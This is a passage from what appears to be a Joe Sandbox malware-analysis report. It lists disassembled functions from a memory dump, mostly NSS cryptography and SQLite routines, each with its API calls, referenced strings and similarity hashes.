Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: 80b182c3ad6e61b06abeade53d0ac903fa5f0e0c3aacf57bd25a144a44c3f40c
Instruction ID: 86fb24e81ef6cfefb05e5d56a0bfbb55623a6d0be7f8e1252a167890b2b55b95
Opcode Fuzzy Hash: 80b182c3ad6e61b06abeade53d0ac903fa5f0e0c3aacf57bd25a144a44c3f40c
Instruction Fuzzy Hash: 2CC17EB1D002599FEB21CF14CE44FEAB7B8AF15348F0481E9E81DA6641E7359E85CFA1

Function 6C730EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C730F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C730FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C731006
PK11_FreeSymKey.NSS3(?), ref: 6C73101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C731033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C73103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C731048
memcpy.VCRUNTIME140(?,?,?), ref: 6C73108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7310BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C7310D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C73112E

Part of subcall function 6C731570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C7308C4,?,?), ref: 6C7315B8
Part of subcall function 6C731570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C7308C4,?,?), ref: 6C7315C1
Part of subcall function 6C731570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C73162E
Part of subcall function 6C731570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C731637

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 2ac75a04001df5fc9ce411f0a7e7e770689f33ac6f678f22e86eb5fc861b5d83
Instruction ID: ca5e420fbe90761841ae87a93c94c774cc33597c16f2cc2f022ea2ead5c0583d
Opcode Fuzzy Hash: 2ac75a04001df5fc9ce411f0a7e7e770689f33ac6f678f22e86eb5fc861b5d83
Instruction Fuzzy Hash: 3A71C0B5A042158FDB00CFA5CE88AAAB7F0BF44318F148638E50D97B12E731D954CB91

Function 6C751CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6C751F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6C752166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C75228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C7523B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C75241C

Strings

manufacturer, xrefs: 6C752179
serial, xrefs: 6C7522A2
token, xrefs: 6C751F2C
model, xrefs: 6C7523CB, 6C7523EC

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: 6df907165ba0ec0e847cc2b185ee499f6966c8e76bb5ef45f412c7f96a5b8922
Instruction ID: a9408560b008525a12f46fb5d539e2313477b775380a702d5975fcccc73423e9
Opcode Fuzzy Hash: 6df907165ba0ec0e847cc2b185ee499f6966c8e76bb5ef45f412c7f96a5b8922
Instruction Fuzzy Hash: 800240A2D0C7C86EF7318671C54C7D77AE09B45328F8D167EC5DE46AC3CBA868988391

Function 6C756C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C701C6F,00000000,00000004,?,?), ref: 6C756C3F

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C701C6F,00000000,00000004,?,?), ref: 6C756C60
PR_ExplodeTime.NSS3(00000000,6C701C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C701C6F,00000000,00000004,?,?), ref: 6C756C94

Strings

gfff, xrefs: 6C756D9C
gfff, xrefs: 6C756CF5
gfff, xrefs: 6C756CFD
gfff, xrefs: 6C756D30
gfff, xrefs: 6C756D66

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: db3e68bf4a71967849b5aea855757439aaeacac90a5f8b4cf86ac28410c110bf
Instruction ID: 4fac6f48f468301f2c162d1a3d078b3860656c26098d1308a2c89cf42eba573d
Opcode Fuzzy Hash: db3e68bf4a71967849b5aea855757439aaeacac90a5f8b4cf86ac28410c110bf
Instruction Fuzzy Hash: B0515C72B016494FC70CCDADDC527DAB7DAABA4310F48C23AE842DB785DA78E906C751

Function 6C7D0F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C7D1027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7D10B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7D1353

Strings

$, xrefs: 6C7D12A0
%lld, xrefs: 6C7D114B
NULL, xrefs: 6C7D119E
-- , xrefs: 6C7D0FF5
%02x, xrefs: 6C7D12F6
zeroblob(%d), xrefs: 6C7D1223
'%.*q', xrefs: 6C7D1217, 6C7D1292

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: 7689f5de41d4988e1c26f61d2c6eff65d8edaf3a806826c8c8ee9f8fcbcbb3c8
Instruction ID: 62cd6d86cfc55dbfdd8c91cb33b5fd84d91f734010a7f5649f566accc3c77acc
Opcode Fuzzy Hash: 7689f5de41d4988e1c26f61d2c6eff65d8edaf3a806826c8c8ee9f8fcbcbb3c8
Instruction Fuzzy Hash: 9EE1B071A083409FD710CF18D580A6BBBF1BF86368F16892DE58587B51D771F849CB42

Function 6C7D8FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7D8FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7D90DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7D9118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7D915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7D91C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7D9209

Strings

UUUU, xrefs: 6C7D9255
3333, xrefs: 6C7D925E

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 856e19f0ed0406e6eba0ec9702877cf17877784d203b9350fe602de691057f84
Instruction ID: eeb7d49f728434122bb9e40ccf2cbf2f6ff0a7157cc80dd717bc993c70a900cc
Opcode Fuzzy Hash: 856e19f0ed0406e6eba0ec9702877cf17877784d203b9350fe602de691057f84
Instruction Fuzzy Hash: BEA19F72E001159BDB14CB68DD95BAEB7B5AB88324F0A4139E905B7741EB36EC01CBE1

Function 6C690FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C68CA30: EnterCriticalSection.KERNEL32(?,?,?,6C6EF9C9,?,6C6EF4DA,6C6EF9C9,?,?,6C6B369A), ref: 6C68CA7A
Part of subcall function 6C68CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C68CB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C69103E
EnterCriticalSection.KERNEL32(?), ref: 6C691139
LeaveCriticalSection.KERNEL32(?), ref: 6C691190
sqlite3_free.NSS3(00000000), ref: 6C691227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C69126E
sqlite3_free.NSS3(?), ref: 6C69127F

Strings

winAccess, xrefs: 6C69129B
delayed %dms for lock/sharing conflict at line %d, xrefs: 6C691267

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1873940834
Opcode ID: cb8b62e80829efa3c1a162cdf5fb7860fff807ae1903d8d2b72b40455e9905ec
Instruction ID: d95db37d1766cad2631e254f9f0b5904bb399180222b57f412249d300e3db7e3
Opcode Fuzzy Hash: cb8b62e80829efa3c1a162cdf5fb7860fff807ae1903d8d2b72b40455e9905ec
Instruction Fuzzy Hash: DC712B31709212ABEB64DF25DC95AAE3379FB87318F240639E81587A80DB34D845C7DB

Function 6C69AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C7BCF46,?,6C68CDBD,?,6C7BBF31,?,?,?,?,?,?,?), ref: 6C69B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C7BCF46,?,6C68CDBD,?,6C7BBF31), ref: 6C69B090
sqlite3_free.NSS3(?,?,?,?,?,?,6C7BCF46,?,6C68CDBD,?,6C7BBF31), ref: 6C69B0A2
CloseHandle.KERNEL32(?,?,6C7BCF46,?,6C68CDBD,?,6C7BBF31,?,?,?,?,?,?,?,?,?), ref: 6C69B100
sqlite3_free.NSS3(?,?,00000002,?,6C7BCF46,?,6C68CDBD,?,6C7BBF31,?,?,?,?,?,?,?), ref: 6C69B115
sqlite3_free.NSS3(?,?,?,?,?,?,6C7BCF46,?,6C68CDBD,?,6C7BBF31), ref: 6C69B12D

Part of subcall function 6C689EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C69C6FD,?,?,?,?,6C6EF965,00000000), ref: 6C689F0E
Part of subcall function 6C689EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C6EF965,00000000), ref: 6C689F5D

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: 64dd36e8025769bba12e03fb9c2228b91693802bbdda85edb12d312d446b3f30
Instruction ID: 363c9304fef1736c0c9f4bdd64aa5392c37d448ae1e35f10ba635e896322f203
Opcode Fuzzy Hash: 64dd36e8025769bba12e03fb9c2228b91693802bbdda85edb12d312d446b3f30
Instruction Fuzzy Hash: E791DDB0E042068FDB24CF25C984ABBB7F1FF86308F14462DE41697A51EB35E845CB99

Function 6C818D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8614E4,6C7CCC70), ref: 6C818D47
PR_GetCurrentThread.NSS3 ref: 6C818D98

Part of subcall function 6C6F0F00: PR_GetPageSize.NSS3(6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F1B
Part of subcall function 6C6F0F00: PR_NewLogModule.NSS3(clock,6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C818E7B
htons.WSOCK32(?), ref: 6C818EDB
PR_GetCurrentThread.NSS3 ref: 6C818F99
PR_GetCurrentThread.NSS3 ref: 6C81910A

Strings

%u.%u.%u.%u, xrefs: 6C818E74

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 4f215e7b293a90f0689375ed7dcaa36962088ae79c7b065fc2254cedba63d74c
Instruction ID: b4ac21e3e21f144f9e0da6ac0485e533da5aaf698afd4e25aa20a70be083ff59
Opcode Fuzzy Hash: 4f215e7b293a90f0689375ed7dcaa36962088ae79c7b065fc2254cedba63d74c
Instruction Fuzzy Hash: EB02CB329092578FDB24CF19C568366BBF3EF42314F1A8B9AC8915BE91C339D985C790

Function 6C7968E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6C7968FC
PR_EnterMonitor.NSS3 ref: 6C796924

Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90AB
Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90C9
Part of subcall function 6C7C9090: EnterCriticalSection.KERNEL32 ref: 6C7C90E5
Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C9116
Part of subcall function 6C7C9090: LeaveCriticalSection.KERNEL32 ref: 6C7C913F

Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB

PR_EnterMonitor.NSS3 ref: 6C79693E
TlsGetValue.KERNEL32 ref: 6C796977
TlsGetValue.KERNEL32 ref: 6C7969B8
PR_ExitMonitor.NSS3 ref: 6C796B1E
PR_ExitMonitor.NSS3 ref: 6C796B39
TlsGetValue.KERNEL32 ref: 6C796B62

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
String ID:
API String ID: 4003455268-0
Opcode ID: dbd3addbc72e9550adcc913646695cc7ac904b79df43c28db8457eec921d58cb
Instruction ID: 4bb7fce267083e654de0318fd8c74ab0033374d7d1d9a4fa934829599adc1ac4
Opcode Fuzzy Hash: dbd3addbc72e9550adcc913646695cc7ac904b79df43c28db8457eec921d58cb
Instruction Fuzzy Hash: DC915074659100CBD790DF2DE68095D7BB2FB87308B718769C8448BA1DE775DA81CBC2

Function 6C69EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

not authorized, xrefs: 6C69F957, 6C69F9BA
authorizer malfunction, xrefs: 6C69F95C, 6C69F9BF, 6C69FA5E, 6C69FA8B
sqlite_temp_master, xrefs: 6C69F0A6, 6C69F2D5
%s %T already exists, xrefs: 6C69FAC8
there is already an index named %s, xrefs: 6C69F9D7
table, xrefs: 6C69F05C, 6C69FABC, 6C69FAC7
view, xrefs: 6C69F061, 6C69F071, 6C69FAB7
sqlite_master, xrefs: 6C69F0AB, 6C69F2DA, 6C69F757, 6C69F93E
temporary table name must be unqualified, xrefs: 6C69F734

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: 51563e92b088905816beaf2c6879ae630bed8a3921f2d80ab397c46e7f4dd14b
Instruction ID: 1255b14ef4380ac43827adb80a6f06909c532f41f43d386865ac921e46136fcb
Opcode Fuzzy Hash: 51563e92b088905816beaf2c6879ae630bed8a3921f2d80ab397c46e7f4dd14b
Instruction Fuzzy Hash: 4F72D270E042068FDB14CF68C484BAABBF1FF49308F1681AEE8159B752D775E846CB95

Function 6C7B9C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,6C68C52B), ref: 6C7B9D53
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7BA035
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7BA114

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7BA01F, 6C7BA0E4, 6C7BA0FE
database corruption, xrefs: 6C7BA029, 6C7BA108
%s at line %d of [%.10s], xrefs: 6C7BA02E, 6C7BA10D

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_log$memcmp
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 717804543-598938438
Opcode ID: c4bcfa86b5b5fd53f60fd4deac7f7883cecd3a234511465d0dccc4814eda9310
Instruction ID: da07a82575ac2710d6a79aa99f8564130795733147af75f9fc0ff8aeb3fdcb87
Opcode Fuzzy Hash: c4bcfa86b5b5fd53f60fd4deac7f7883cecd3a234511465d0dccc4814eda9310
Instruction Fuzzy Hash: CE22BD716087418FC704CF29C69066AB7F1BFEA354F14CA2DE8EAA7A41D735E845CB42

Function 6C7209A0 Relevance: 11.0, APIs: 7, Instructions: 489memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7206A0: TlsGetValue.KERNEL32 ref: 6C7206C2
Part of subcall function 6C7206A0: EnterCriticalSection.KERNEL32(?), ref: 6C7206D6
Part of subcall function 6C7206A0: PR_Unlock.NSS3 ref: 6C7206EB

memcmp.VCRUNTIME140(00000000,6C709B8A,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6C709B8A,00000000,k-pl), ref: 6C7209D9
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6C709B8A,00000000,k-pl), ref: 6C7209F2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C709B8A,00000000,k-pl), ref: 6C720A1C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C709B8A,00000000,k-pl), ref: 6C720A30
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C709B8A,00000000,k-pl), ref: 6C720A48

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

